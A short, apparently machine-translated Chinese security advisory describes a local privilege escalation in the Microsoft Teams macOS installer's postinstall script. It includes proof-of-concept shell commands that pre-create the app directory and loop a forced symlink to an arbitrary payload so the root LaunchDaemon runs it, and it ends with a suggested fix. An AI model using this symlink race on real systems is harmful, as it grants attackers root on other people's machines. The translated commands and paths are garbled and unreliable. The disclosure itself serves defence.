微软团队macOS地方特权升级安装

通过teams_osx.pkg地方特权升级

在最新的安装包为团队macOS微软提供的(Teams_osx.pkg),“postinstall”脚本包含在安装程序允许从一个普通用户特权升级到根由于不当使用权限文件整个安装过程。

团队在安装过程中,应用程序的内容搬到“/应用程序”是正常的。“postinstall”脚本创建了一个LaunchDaemon指向TeamsUpdaterDaemon应用程序(" /应用程序/微软Teams.app /内容/ TeamsUpdaterDaemon.xpc /内容/ MacOS / TeamsUpdaterDaemon”),它将运行根权限。这里的问题是,如果一个本地攻击者能够创建“/应用程序/微软团队”目录树在安装之前,他们可以覆盖TeamsUpdaterDaemon应用程序自定义的有效负载,将作为LaunchDaemon运行,从而让攻击者根权限。

例如:

在安装之前#预备步骤
/ tmp❯❯❯mkdir - p”微软Teams.app /内容/应用程序/ / TeamsUpdaterDaemon.xpc /内容/ MacOS /”

#只是在安装之前,运行。不雅的,但它的工作原理。

#载荷可以不管。它不会产生一个GUI,所以一个定制的滴管或其他应用程序将是必要的
/ tmp❯❯❯而真实;做
ln - f - f - s / tmp /负载/应用程序/微软Teams.app /内容/ TeamsUpdaterDaemon.xpc /内容/ MacOS / TeamsUpdaterDaemon”
完成

#运行安装程序。等待。

上面简单地创建一个符号链接任意载荷在使用的文件路径创建LaunchDaemon postinstall脚本。为了解决这个问题,我们建议验证的完整性TeamsUpdaterDaemon之前创建LaunchDaemon条目,或使用预设脚本验证权限”/应用程序/微软团队”。